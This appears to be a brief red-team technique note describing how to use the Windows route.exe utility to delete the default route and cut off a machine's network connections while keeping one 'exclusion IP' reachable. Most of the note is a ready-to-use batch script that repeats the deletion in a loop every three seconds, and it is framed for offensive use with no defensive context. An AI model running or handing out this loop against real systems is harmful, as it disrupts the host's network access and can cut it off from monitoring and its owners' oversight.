redttps

Route.exe to remove connections

Description

This technique involves the use of the built-in Windows command-line utility route.exe to manipulate the system's routing table, specifically to remove existing network routes, effectively cutting off or rerouting network communications.


Steps

  1. Route.exe delete 0.0.0.0 to kill all conections
  2. Route.exe add 'exclusion IP' mask 'Your Mask' 0.0.0.0 to add a exclusion
  3. Make a loop:
    4. @echo off
:loop
route delete 0.0.0.0 >nul 2>&1
route add 'exclusion IP' mask 'Your Mask' 0.0.0.0
timeout /t 3 >nul
goto loop